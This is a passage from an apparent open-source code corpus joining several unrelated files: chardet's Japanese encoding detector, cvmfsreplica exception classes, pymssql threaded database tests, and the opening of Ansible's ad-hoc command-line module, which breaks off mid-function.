(0,1,0,0,0,1,0,0,0,0,4,0,4,1,4,0,3,0,4,0,3,0,4,0,3,0,3,0,4,1,5,1,4,0,0,3,0,5,0,5,2,0,1,0,0,0,2,1,4,0,1,3,0,0,3,0,0,3,1,1,4,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0),
(1,4,0,5,0,3,0,2,0,3,5,4,4,3,4,3,5,3,4,3,3,0,4,3,3,3,3,3,3,2,4,4,3,1,3,4,4,5,4,4,3,4,4,1,3,5,4,3,3,3,1,2,2,3,3,1,3,1,3,3,3,5,3,3,4,5,0,3,0,3,0,3,4,3,4,4,3,0,3,0,2,4,3),
(0,1,0,4,0,0,0,0,0,1,4,0,4,1,4,2,4,0,3,0,1,0,1,0,0,0,0,0,2,0,3,1,1,1,0,3,0,0,0,1,2,1,0,0,1,1,1,1,0,1,0,0,0,1,0,0,3,0,0,0,0,3,2,0,2,2,0,1,0,0,0,2,3,2,3,3,0,0,0,0,2,1,0),
(0,5,1,5,0,3,0,3,0,5,4,4,5,1,5,3,3,0,4,3,4,3,5,3,4,3,3,2,4,3,4,3,3,0,3,3,1,4,4,3,4,4,4,3,4,5,5,3,2,3,1,1,3,3,1,3,1,1,3,3,2,4,5,3,3,5,0,4,0,3,0,4,4,3,5,3,3,0,3,4,0,4,3),
(0,5,0,5,0,3,0,2,0,4,4,3,5,2,4,3,3,3,4,4,4,3,5,3,5,3,3,1,4,0,4,3,3,0,3,3,0,4,4,4,4,5,4,3,3,5,5,3,2,3,1,2,3,2,0,1,0,0,3,2,2,4,4,3,1,5,0,4,0,3,0,4,3,1,3,2,1,0,3,3,0,3,3),
(0,4,0,5,0,5,0,4,0,4,5,5,5,3,4,3,3,2,5,4,4,3,5,3,5,3,4,0,4,3,4,4,3,2,4,4,3,4,5,4,4,5,5,0,3,5,5,4,1,3,3,2,3,3,1,3,1,0,4,3,1,4,4,3,4,5,0,4,0,2,0,4,3,4,4,3,3,0,4,0,0,5,5),
(0,4,0,4,0,5,0,1,1,3,3,4,4,3,4,1,3,0,5,1,3,0,3,1,3,1,1,0,3,0,3,3,4,0,4,3,0,4,4,4,3,4,4,0,3,5,4,1,0,3,0,0,2,3,0,3,1,0,3,1,0,3,2,1,3,5,0,3,0,1,0,3,2,3,3,4,4,0,2,2,0,4,4),
(2,4,0,5,0,4,0,3,0,4,5,5,4,3,5,3,5,3,5,3,5,2,5,3,4,3,3,4,3,4,5,3,2,1,5,4,3,2,3,4,5,3,4,1,2,5,4,3,0,3,3,0,3,2,0,2,3,0,4,1,0,3,4,3,3,5,0,3,0,1,0,4,5,5,5,4,3,0,4,2,0,3,5),
(0,5,0,4,0,4,0,2,0,5,4,3,4,3,4,3,3,3,4,3,4,2,5,3,5,3,4,1,4,3,4,4,4,0,3,5,0,4,4,4,4,5,3,1,3,4,5,3,3,3,3,3,3,3,0,2,2,0,3,3,2,4,3,3,3,5,3,4,1,3,3,5,3,2,0,0,0,0,4,3,1,3,3),
(0,1,0,3,0,3,0,1,0,1,3,3,3,2,3,3,3,0,3,0,0,0,3,1,3,0,0,0,2,2,2,3,0,0,3,2,0,1,2,4,1,3,3,0,0,3,3,3,0,1,0,0,2,1,0,0,3,0,3,1,0,3,0,0,1,3,0,2,0,1,0,3,3,1,3,3,0,0,1,1,0,3,3),
(0,2,0,3,0,2,1,4,0,2,2,3,1,1,3,1,1,0,2,0,3,1,2,3,1,3,0,0,1,0,4,3,2,3,3,3,1,4,2,3,3,3,3,1,0,3,1,4,0,1,1,0,1,2,0,1,1,0,1,1,0,3,1,3,2,2,0,1,0,0,0,2,3,3,3,1,0,0,0,0,0,2,3),
(0,5,0,4,0,5,0,2,0,4,5,5,3,3,4,3,3,1,5,4,4,2,4,4,4,3,4,2,4,3,5,5,4,3,3,4,3,3,5,5,4,5,5,1,3,4,5,3,1,4,3,1,3,3,0,3,3,1,4,3,1,4,5,3,3,5,0,4,0,3,0,5,3,3,1,4,3,0,4,0,1,5,3),
(0,5,0,5,0,4,0,2,0,4,4,3,4,3,3,3,3,3,5,4,4,4,4,4,4,5,3,3,5,2,4,4,4,3,4,4,3,3,4,4,5,5,3,3,4,3,4,3,3,4,3,3,3,3,1,2,2,1,4,3,3,5,4,4,3,4,0,4,0,3,0,4,4,4,4,4,1,0,4,2,0,2,4),
(0,4,0,4,0,3,0,1,0,3,5,2,3,0,3,0,2,1,4,2,3,3,4,1,4,3,3,2,4,1,3,3,3,0,3,3,0,0,3,3,3,5,3,3,3,3,3,2,0,2,0,0,2,0,0,2,0,0,1,0,0,3,1,2,2,3,0,3,0,2,0,4,4,3,3,4,1,0,3,0,0,2,4),
(0,0,0,4,0,0,0,0,0,0,1,0,1,0,2,0,0,0,0,0,1,0,2,0,1,0,0,0,0,0,3,1,3,0,3,2,0,0,0,1,0,3,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,4,0,2,0,0,0,0,0,0,2),
(0,2,1,3,0,2,0,2,0,3,3,3,3,1,3,1,3,3,3,3,3,3,4,2,2,1,2,1,4,0,4,3,1,3,3,3,2,4,3,5,4,3,3,3,3,3,3,3,0,1,3,0,2,0,0,1,0,0,1,0,0,4,2,0,2,3,0,3,3,0,3,3,4,2,3,1,4,0,1,2,0,2,3),
(0,3,0,3,0,1,0,3,0,2,3,3,3,0,3,1,2,0,3,3,2,3,3,2,3,2,3,1,3,0,4,3,2,0,3,3,1,4,3,3,2,3,4,3,1,3,3,1,1,0,1,1,0,1,0,1,0,1,0,0,0,4,1,1,0,3,0,3,1,0,2,3,3,3,3,3,1,0,0,2,0,3,3),
(0,0,0,0,0,0,0,0,0,0,3,0,2,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,3,0,3,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,2,0,2,3,0,0,0,0,0,0,0,0,3),
(0,2,0,3,1,3,0,3,0,2,3,3,3,1,3,1,3,1,3,1,3,3,3,1,3,0,2,3,1,1,4,3,3,2,3,3,1,2,2,4,1,3,3,0,1,4,2,3,0,1,3,0,3,0,0,1,3,0,2,0,0,3,3,2,1,3,0,3,0,2,0,3,4,4,4,3,1,0,3,0,0,3,3),
(0,2,0,1,0,2,0,0,0,1,3,2,2,1,3,0,1,1,3,0,3,2,3,1,2,0,2,0,1,1,3,3,3,0,3,3,1,1,2,3,2,3,3,1,2,3,2,0,0,1,0,0,0,0,0,0,3,0,1,0,0,2,1,2,1,3,0,3,0,0,0,3,4,4,4,3,2,0,2,0,0,2,4),
(0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,3,1,0,0,0,0,0,0,0,3),
(0,3,0,3,0,2,0,3,0,3,3,3,2,3,2,2,2,0,3,1,3,3,3,2,3,3,0,0,3,0,3,2,2,0,2,3,1,4,3,4,3,3,2,3,1,5,4,4,0,3,1,2,1,3,0,3,1,1,2,0,2,3,1,3,1,3,0,3,0,1,0,3,3,4,4,2,1,0,2,1,0,2,4),
(0,1,0,3,0,1,0,2,0,1,4,2,5,1,4,0,2,0,2,1,3,1,4,0,2,1,0,0,2,1,4,1,1,0,3,3,0,5,1,3,2,3,3,1,0,3,2,3,0,1,0,0,0,0,0,0,1,0,0,0,0,4,0,1,0,3,0,2,0,1,0,3,3,3,4,3,3,0,0,0,0,2,3),
(0,0,0,1,0,0,0,0,0,0,2,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,0,0,1,0,0,0,0,0,3),
(0,1,0,3,0,4,0,3,0,2,4,3,1,0,3,2,2,1,3,1,2,2,3,1,1,1,2,1,3,0,1,2,0,1,3,2,1,3,0,5,5,1,0,0,1,3,2,1,0,3,0,0,1,0,0,0,0,0,3,4,0,1,1,1,3,2,0,2,0,1,0,2,3,3,1,2,3,0,1,0,1,0,4),
(0,0,0,1,0,3,0,3,0,2,2,1,0,0,4,0,3,0,3,1,3,0,3,0,3,0,1,0,3,0,3,1,3,0,3,3,0,0,1,2,1,1,1,0,1,2,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,2,2,1,2,0,0,2,0,0,0,0,2,3,3,3,3,0,0,0,0,1,4),
(0,0,0,3,0,3,0,0,0,0,3,1,1,0,3,0,1,0,2,0,1,0,0,0,0,0,0,0,1,0,3,0,2,0,2,3,0,0,2,2,3,1,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,2,3),
(2,4,0,5,0,5,0,4,0,3,4,3,3,3,4,3,3,3,4,3,4,4,5,4,5,5,5,2,3,0,5,5,4,1,5,4,3,1,5,4,3,4,4,3,3,4,3,3,0,3,2,0,2,3,0,3,0,0,3,3,0,5,3,2,3,3,0,3,0,3,0,3,4,5,4,5,3,0,4,3,0,3,4),
(0,3,0,3,0,3,0,3,0,3,3,4,3,2,3,2,3,0,4,3,3,3,3,3,3,3,3,0,3,2,4,3,3,1,3,4,3,4,4,4,3,4,4,3,2,4,4,1,0,2,0,0,1,1,0,2,0,0,3,1,0,5,3,2,1,3,0,3,0,1,2,4,3,2,4,3,3,0,3,2,0,4,4),
(0,3,0,3,0,1,0,0,0,1,4,3,3,2,3,1,3,1,4,2,3,2,4,2,3,4,3,0,2,2,3,3,3,0,3,3,3,0,3,4,1,3,3,0,3,4,3,3,0,1,1,0,1,0,0,0,4,0,3,0,0,3,1,2,1,3,0,4,0,1,0,4,3,3,4,3,3,0,2,0,0,3,3),
(0,3,0,4,0,1,0,3,0,3,4,3,3,0,3,3,3,1,3,1,3,3,4,3,3,3,0,0,3,1,5,3,3,1,3,3,2,5,4,3,3,4,5,3,2,5,3,4,0,1,0,0,0,0,0,2,0,0,1,1,0,4,2,2,1,3,0,3,0,2,0,4,4,3,5,3,2,0,1,1,0,3,4),
(0,5,0,4,0,5,0,2,0,4,4,3,3,2,3,3,3,1,4,3,4,1,5,3,4,3,4,0,4,2,4,3,4,1,5,4,0,4,4,4,4,5,4,1,3,5,4,2,1,4,1,1,3,2,0,3,1,0,3,2,1,4,3,3,3,4,0,4,0,3,0,4,4,4,3,3,3,0,4,2,0,3,4),
(1,4,0,4,0,3,0,1,0,3,3,3,1,1,3,3,2,2,3,3,1,0,3,2,2,1,2,0,3,1,2,1,2,0,3,2,0,2,2,3,3,4,3,0,3,3,1,2,0,1,1,3,1,2,0,0,3,0,1,1,0,3,2,2,3,3,0,3,0,0,0,2,3,3,4,3,3,0,1,0,0,1,4),
(0,4,0,4,0,4,0,0,0,3,4,4,3,1,4,2,3,2,3,3,3,1,4,3,4,0,3,0,4,2,3,3,2,2,5,4,2,1,3,4,3,4,3,1,3,3,4,2,0,2,1,0,3,3,0,0,2,0,3,1,0,4,4,3,4,3,0,4,0,1,0,2,4,4,4,4,4,0,3,2,0,3,3),
(0,0,0,1,0,4,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,3,2,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,2),
(0,2,0,3,0,4,0,4,0,1,3,3,3,0,4,0,2,1,2,1,1,1,2,0,3,1,1,0,1,0,3,1,0,0,3,3,2,0,1,1,0,0,0,0,0,1,0,2,0,2,2,0,3,1,0,0,1,0,1,1,0,1,2,0,3,0,0,0,0,1,0,0,3,3,4,3,1,0,1,0,3,0,2),
(0,0,0,3,0,5,0,0,0,0,1,0,2,0,3,1,0,1,3,0,0,0,2,0,0,0,1,0,0,0,1,1,0,0,4,0,0,0,2,3,0,1,4,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,1,0,0,0,0,0,0,0,2,0,0,3,0,0,0,0,0,3),
(0,2,0,5,0,5,0,1,0,2,4,3,3,2,5,1,3,2,3,3,3,0,4,1,2,0,3,0,4,0,2,2,1,1,5,3,0,0,1,4,2,3,2,0,3,3,3,2,0,2,4,1,1,2,0,1,1,0,3,1,0,1,3,1,2,3,0,2,0,0,0,1,3,5,4,4,4,0,3,0,0,1,3),
(0,4,0,5,0,4,0,4,0,4,5,4,3,3,4,3,3,3,4,3,4,4,5,3,4,5,4,2,4,2,3,4,3,1,4,4,1,3,5,4,4,5,5,4,4,5,5,5,2,3,3,1,4,3,1,3,3,0,3,3,1,4,3,4,4,4,0,3,0,4,0,3,3,4,4,5,0,0,4,3,0,4,5),
(0,4,0,4,0,3,0,3,0,3,4,4,4,3,3,2,4,3,4,3,4,3,5,3,4,3,2,1,4,2,4,4,3,1,3,4,2,4,5,5,3,4,5,4,1,5,4,3,0,3,2,2,3,2,1,3,1,0,3,3,3,5,3,3,3,5,4,4,2,3,3,4,3,3,3,2,1,0,3,2,1,4,3),
(0,4,0,5,0,4,0,3,0,3,5,5,3,2,4,3,4,0,5,4,4,1,4,4,4,3,3,3,4,3,5,5,2,3,3,4,1,2,5,5,3,5,5,2,3,5,5,4,0,3,2,0,3,3,1,1,5,1,4,1,0,4,3,2,3,5,0,4,0,3,0,5,4,3,4,3,0,0,4,1,0,4,4),
(1,3,0,4,0,2,0,2,0,2,5,5,3,3,3,3,3,0,4,2,3,4,4,4,3,4,0,0,3,4,5,4,3,3,3,3,2,5,5,4,5,5,5,4,3,5,5,5,1,3,1,0,1,0,0,3,2,0,4,2,0,5,2,3,2,4,1,3,0,3,0,4,5,4,5,4,3,0,4,2,0,5,4),
(0,3,0,4,0,5,0,3,0,3,4,4,3,2,3,2,3,3,3,3,3,2,4,3,3,2,2,0,3,3,3,3,3,1,3,3,3,0,4,4,3,4,4,1,1,4,4,2,0,3,1,0,1,1,0,4,1,0,2,3,1,3,3,1,3,4,0,3,0,1,0,3,1,3,0,0,1,0,2,0,0,4,4),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,3,0,3,0,2,0,3,0,1,5,4,3,3,3,1,4,2,1,2,3,4,4,2,4,4,5,0,3,1,4,3,4,0,4,3,3,3,2,3,2,5,3,4,3,2,2,3,0,0,3,0,2,1,0,1,2,0,0,0,0,2,1,1,3,1,0,2,0,4,0,3,4,4,4,5,2,0,2,0,0,1,3),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,4,2,1,1,0,1,0,3,2,0,0,3,1,1,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,1,0,0,0,2,0,0,0,1,4,0,4,2,1,0,0,0,0,0,1),
(0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,3,1,0,0,0,2,0,2,1,0,0,1,2,1,0,1,1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,1,3,1,0,0,0,0,0,1,0,0,2,1,0,0,0,0,0,0,0,0,2),
(0,4,0,4,0,4,0,3,0,4,4,3,4,2,4,3,2,0,4,4,4,3,5,3,5,3,3,2,4,2,4,3,4,3,1,4,0,2,3,4,4,4,3,3,3,4,4,4,3,4,1,3,4,3,2,1,2,1,3,3,3,4,4,3,3,5,0,4,0,3,0,4,3,3,3,2,1,0,3,0,0,3,3),
(0,4,0,3,0,3,0,3,0,3,5,5,3,3,3,3,4,3,4,3,3,3,4,4,4,3,3,3,3,4,3,5,3,3,1,3,2,4,5,5,5,5,4,3,4,5,5,3,2,2,3,3,3,3,2,3,3,1,2,3,2,4,3,3,3,4,0,4,0,2,0,4,3,2,2,1,2,0,3,0,0,4,1),
)
class JapaneseContextAnalysis(object):
    """Base class for Japanese hiragana 2-char context analysis.

    Feed it encoded byte buffers; it counts how often consecutive hiragana
    pairs fall into each frequency category of ``jp2CharContext`` and derives
    a confidence that the input really is Japanese text in the encoding the
    subclass understands (subclasses supply ``get_order``).
    """
    NUM_OF_CATEGORY = 6          # number of frequency categories in jp2CharContext
    DONT_KNOW = -1               # confidence value returned on too little data
    ENOUGH_REL_THRESHOLD = 100   # enough pairs seen to trust the result
    MAX_REL_THRESHOLD = 1000     # stop analysing after this many pairs
    MINIMUM_DATA_THRESHOLD = 4   # fewer pairs than this -> DONT_KNOW

    def __init__(self):
        self._total_rel = None
        self._rel_sample = None
        self._need_to_skip_char_num = None
        self._last_char_order = None
        self._done = None
        self.reset()

    def reset(self):
        """Reset all accumulated statistics so the instance can be reused."""
        self._total_rel = 0 # total sequence received
        # category counters, each integer counts sequence in its category
        self._rel_sample = [0] * self.NUM_OF_CATEGORY
        # if last byte in current buffer is not the last byte of a character,
        # we need to know how many bytes to skip in next buffer
        self._need_to_skip_char_num = 0
        self._last_char_order = -1 # The order of previous char
        # If this flag is set to True, detection is done and conclusion has
        # been made
        self._done = False

    def feed(self, byte_str, num_bytes):
        """Consume num_bytes bytes of byte_str, updating the pair statistics."""
        if self._done:
            return
        # The buffer we got is byte oriented, and a character may span more
        # than one buffer. In case the last one or two bytes of the previous
        # buffer were not complete, we recorded how many bytes are needed to
        # complete that character and skip them here. We could instead keep
        # those bytes and analyse the character once it is complete, but one
        # character makes little difference, so simply skipping it keeps the
        # logic simple and improves performance.
        # NOTE(review): _need_to_skip_char_num is only assigned below when a
        # character overruns the buffer, and in reset(); if a buffer ends
        # exactly on a character boundary, a stale skip count from an earlier
        # buffer survives into the next feed() call -- confirm intended.
        i = self._need_to_skip_char_num
        while i < num_bytes:
            order, char_len = self.get_order(byte_str[i:i + 2])
            i += char_len
            if i > num_bytes:
                # character continues in the next buffer: remember how much
                # of it to skip and forget the dangling previous char
                self._need_to_skip_char_num = i - num_bytes
                self._last_char_order = -1
            else:
                # count only hiragana->hiragana transitions
                if (order != -1) and (self._last_char_order != -1):
                    self._total_rel += 1
                    if self._total_rel > self.MAX_REL_THRESHOLD:
                        self._done = True
                        break
                    self._rel_sample[jp2CharContext[self._last_char_order][order]] += 1
                self._last_char_order = order

    def got_enough_data(self):
        """Return True once enough pairs were seen for a reliable answer."""
        return self._total_rel > self.ENOUGH_REL_THRESHOLD

    def get_confidence(self):
        """Return the fraction of observed pairs that are plausible Japanese."""
        # This is just one way to calculate confidence. It works well for me.
        if self._total_rel > self.MINIMUM_DATA_THRESHOLD:
            # category 0 counts "never seen" pairs; everything else supports
            # the Japanese hypothesis
            return (self._total_rel - self._rel_sample[0]) / self._total_rel
        else:
            return self.DONT_KNOW

    def get_order(self, byte_str):
        # Overridden by subclasses; the base implementation knows no encoding
        # and reports "not hiragana, 1 byte".
        return -1, 1
class SJISContextAnalysis(JapaneseContextAnalysis):
    """Context analysis specialised for Shift_JIS (and its CP932 superset)."""

    def __init__(self):
        super(SJISContextAnalysis, self).__init__()
        self._charset_name = "SHIFT_JIS"

    @property
    def charset_name(self):
        # May be upgraded to "CP932" by get_order() when CP932-only lead
        # bytes are observed.
        return self._charset_name

    def get_order(self, byte_str):
        """Return (hiragana order, char byte length) for the leading char.

        The order is -1 for anything that is not hiragana.
        """
        if not byte_str:
            return -1, 1
        # find out current char's byte length
        first_char = byte_str[0]
        if (0x81 <= first_char <= 0x9F) or (0xE0 <= first_char <= 0xFC):
            char_len = 2
            if (first_char == 0x87) or (0xFA <= first_char <= 0xFC):
                self._charset_name = "CP932"
        else:
            char_len = 1

        # return its order if it is hiragana
        if len(byte_str) > 1:
            second_char = byte_str[1]
            # 0x82 is the Shift_JIS lead byte for hiragana (0x829F-0x82F1).
            # The historical comparison against decimal 202 came from
            # mis-porting the Python 2 octal literal '\202' (== 0x82); with
            # 202 this branch matched a kanji lead byte (0xCA) instead, so
            # hiragana were never recognised in valid Shift_JIS input.
            if (first_char == 0x82) and (0x9F <= second_char <= 0xF1):
                return second_char - 0x9F, char_len

        return -1, char_len
class EUCJPContextAnalysis(JapaneseContextAnalysis):
    """Context analysis specialised for EUC-JP encoded input."""

    def get_order(self, byte_str):
        """Return (hiragana order, char byte length) for the leading char.

        The order is -1 for anything that is not hiragana.
        """
        if not byte_str:
            return -1, 1
        lead = byte_str[0]
        # Determine the byte length of the current character from its lead
        # byte: 0x8F introduces a 3-byte char, 0x8E and 0xA1-0xFE introduce
        # 2-byte chars, everything else is a single byte.
        if lead == 0x8F:
            char_len = 3
        elif lead == 0x8E or 0xA1 <= lead <= 0xFE:
            char_len = 2
        else:
            char_len = 1
        # Hiragana occupy lead byte 0xA4 with trail bytes 0xA1-0xF3.
        if len(byte_str) > 1 and lead == 0xA4:
            trail = byte_str[1]
            if 0xA1 <= trail <= 0xF3:
                return trail - 0xA1, char_len
        return -1, char_len
| apache-2.0 |
jose-caballero/cvmfsreplica | cvmfsreplica/cvmfsreplicaex.py | 1 | 1122 | #! /usr/bin/env python
#
# exception classes for cvmfsreplica project
class ServiceConfigurationFailure(Exception):
    """Raised when the basic service configuration cannot be read."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return "%r" % (self.value,)
class RepositoriesConfigurationFailure(Exception):
    """Raised when the basic repositories configuration cannot be read."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return "%r" % (self.value,)
class PluginConfigurationFailure(Exception):
    """Raised when a plugin configuration cannot be read."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return "%r" % (self.value,)
class AcceptancePluginFailed(Exception):
    """Raised when an Acceptance Plugin fails and its should_abort is True."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return "%r" % (self.value,)
| gpl-3.0 |
klothe/pymssql | tests/test_threaded.py | 6 | 3066 | import sys
import threading
import time
import unittest
from _mssql import MSSQLDatabaseException
from .helpers import mssqlconn, StoredProc, mark_slow
# Stored procedure whose body is intentionally invalid: executing it raises a
# server-side error, which the *ErrorSproc* thread tests below expect to see.
error_sproc = StoredProc(
    "pymssqlErrorThreadTest",
    args=(),
    body="SELECT unknown_column FROM unknown_table")
class _TestingThread(threading.Thread):
def __init__(self):
super(_TestingThread, self).__init__()
self.results = []
self.exc = None
def run(self):
try:
with mssqlconn() as mssql:
for i in range(0, 1000):
num = mssql.execute_scalar('SELECT %d', (i,))
assert num == i
self.results.append(num)
except Exception as exc:
self.exc = exc
class _TestingErrorThread(_TestingThread):
    """Worker that provokes a server-side error by selecting an unknown column."""

    def run(self):
        try:
            with mssqlconn() as conn:
                conn.execute_query('SELECT unknown_column')
        except Exception as error:
            self.exc = error
class _SprocTestingErrorThread(_TestingThread):
    """Worker that provokes a server-side error via the broken stored procedure."""

    def run(self):
        try:
            with mssqlconn() as conn:
                error_sproc.execute(mssql=conn)
        except Exception as error:
            self.exc = error
class ThreadedTests(unittest.TestCase):
    """Exercise pymssql from many concurrent threads."""

    def run_threads(self, num, thread_class):
        """Start *num* threads of *thread_class* and wait for them to finish.

        Polls every 5 seconds, printing a "." as a progress indicator.

        Returns:
            (results, exceptions): the non-empty per-thread result lists and
            the exceptions collected from the workers.
        """
        threads = [thread_class() for _ in range(num)]
        for thread in threads:
            thread.start()
        results = []
        exceptions = []
        while len(threads) > 0:
            sys.stdout.write(".")
            sys.stdout.flush()
            for thread in threads:
                if not thread.is_alive():
                    # NOTE(review): removing from the list while iterating it
                    # skips the next element; harmless here only because the
                    # outer while loop re-scans -- confirm intended.
                    threads.remove(thread)
                    if thread.results:
                        results.append(thread.results)
                    if thread.exc:
                        exceptions.append(thread.exc)
            time.sleep(5)
        sys.stdout.write(" ")
        sys.stdout.flush()
        return results, exceptions

    @mark_slow
    def testThreadedUse(self):
        # 50 threads each run 1000 scalar SELECTs; no errors are expected
        results, exceptions = self.run_threads(
            num=50,
            thread_class=_TestingThread)
        self.assertEqual(len(exceptions), 0)
        for result in results:
            self.assertEqual(result, list(range(0, 1000)))

    @mark_slow
    def testErrorThreadedUse(self):
        # every thread queries an unknown column -> one DB exception each
        results, exceptions = self.run_threads(
            num=2,
            thread_class=_TestingErrorThread)
        self.assertEqual(len(exceptions), 2)
        for exc in exceptions:
            self.assertEqual(type(exc), MSSQLDatabaseException)

    @mark_slow
    def testErrorSprocThreadedUse(self):
        # the stored procedure itself selects from an unknown table
        with error_sproc.create():
            results, exceptions = self.run_threads(
                num=5,
                thread_class=_SprocTestingErrorThread)
            self.assertEqual(len(exceptions), 5)
            for exc in exceptions:
                self.assertEqual(type(exc), MSSQLDatabaseException)
# Module-level suite so external runners that look for `suite` pick these up.
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ThreadedTests))

if __name__ == '__main__':
    unittest.main()
| lgpl-2.1 |
Cryptophobia/ansible | lib/ansible/cli/adhoc.py | 5 | 7095 | # (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
########################################################
import os
from ansible import constants as C
from ansible.cli import CLI
from ansible.errors import AnsibleError, AnsibleOptionsError
from ansible.executor.task_queue_manager import TaskQueueManager
from ansible.inventory import Inventory
from ansible.parsing.dataloader import DataLoader
from ansible.parsing.splitter import parse_kv
from ansible.playbook.play import Play
from ansible.plugins import get_all_plugin_loaders
from ansible.utils.vars import load_extra_vars
from ansible.utils.unicode import to_unicode
from ansible.vars import VariableManager
# Reuse the Display instance created by the bin/ansible entry point when one
# exists; fall back to a fresh instance when imported as a library or in tests.
try:
    from __main__ import display
except ImportError:
    from ansible.utils.display import Display
    display = Display()
########################################################
class AdHocCLI(CLI):
''' code behind ansible ad-hoc cli'''
    def parse(self):
        ''' create an options parser for bin/ansible '''

        self.parser = CLI.base_parser(
            usage='%prog <host-pattern> [options]',
            runas_opts=True,
            inventory_opts=True,
            async_opts=True,
            output_opts=True,
            connect_opts=True,
            check_opts=True,
            runtask_opts=True,
            vault_opts=True,
            fork_opts=True,
            module_opts=True,
        )

        # options unique to ansible ad-hoc
        self.parser.add_option('-a', '--args', dest='module_args',
            help="module arguments", default=C.DEFAULT_MODULE_ARGS)
        self.parser.add_option('-m', '--module-name', dest='module_name',
            help="module name to execute (default=%s)" % C.DEFAULT_MODULE_NAME,
            default=C.DEFAULT_MODULE_NAME)

        # self.args[0] is the program name; everything after option parsing
        # must be exactly one host pattern
        self.options, self.args = self.parser.parse_args(self.args[1:])

        if len(self.args) != 1:
            raise AnsibleOptionsError("Missing target hosts")

        display.verbosity = self.options.verbosity
        # e.g. --ask-pass and --ask-vault-pass both prompting is a conflict
        self.validate_conflicts(runas_opts=True, vault_opts=True, fork_opts=True)

        return True
    def _play_ds(self, pattern, async, poll):
        """Build the in-memory play datastructure for the single ad-hoc task.

        Note: the parameter is literally named ``async``, which is only legal
        on Python < 3.7 (it later became a keyword); this matches the vintage
        of this code base.

        Args:
            pattern: host pattern the play targets.
            async: value passed through to the task's ``async`` keyword.
            poll: value passed through to the task's ``poll`` keyword.
        """
        # command-like modules receive their arguments raw, not key=value parsed
        check_raw = self.options.module_name in ('command', 'shell', 'script', 'raw')
        return dict(
            name = "Ansible Ad-Hoc",
            hosts = pattern,
            gather_facts = 'no',
            tasks = [ dict(action=dict(module=self.options.module_name, args=parse_kv(self.options.module_args, check_raw=check_raw)), async=async, poll=poll) ]
        )
def run(self):
''' use Runner lib to do SSH things '''
super(AdHocCLI, self).run()
# only thing left should be host pattern
pattern = to_unicode(self.args[0], errors='strict')
# ignore connection password cause we are local
if self.options.connection == "local":
self.options.ask_pass = False
sshpass = None
becomepass = None
vault_pass = None
self.normalize_become_options()
(sshpass, becomepass) = self.ask_passwords()
passwords = { 'conn_pass': sshpass, 'become_pass': becomepass }
loader = DataLoader()
if self.options.vault_password_file:
# read vault_pass from a file
vault_pass = CLI.read_vault_password_file(self.options.vault_password_file, loader=loader)
loader.set_vault_password(vault_pass)
elif self.options.ask_vault_pass:
vault_pass = self.ask_vault_passwords()[0]
loader.set_vault_password(vault_pass)
variable_manager = VariableManager()
variable_manager.extra_vars = load_extra_vars(loader=loader, options=self.options)
inventory = Inventory(loader=loader, variable_manager=variable_manager, host_list=self.options.inventory)
variable_manager.set_inventory(inventory)
no_hosts = False
if len(inventory.list_hosts(pattern)) == 0:
# Empty inventory
display.warning("provided hosts list is empty, only localhost is available")
no_hosts = True
inventory.subset(self.options.subset)
hosts = inventory.list_hosts(pattern)
if len(hosts) == 0 and no_hosts is False:
# Invalid limit
raise AnsibleError("Specified --limit does not match any hosts")
if self.options.listhosts:
display.display(' hosts (%d):' % len(hosts))
for host in hosts:
display.display(' %s' % host)
return 0
if self.options.module_name in C.MODULE_REQUIRE_ARGS and not self.options.module_args:
err = "No argument passed to %s module" % self.options.module_name
if pattern.endswith(".yml"):
err = err + ' (did you mean to run ansible-playbook?)'
raise AnsibleOptionsError(err)
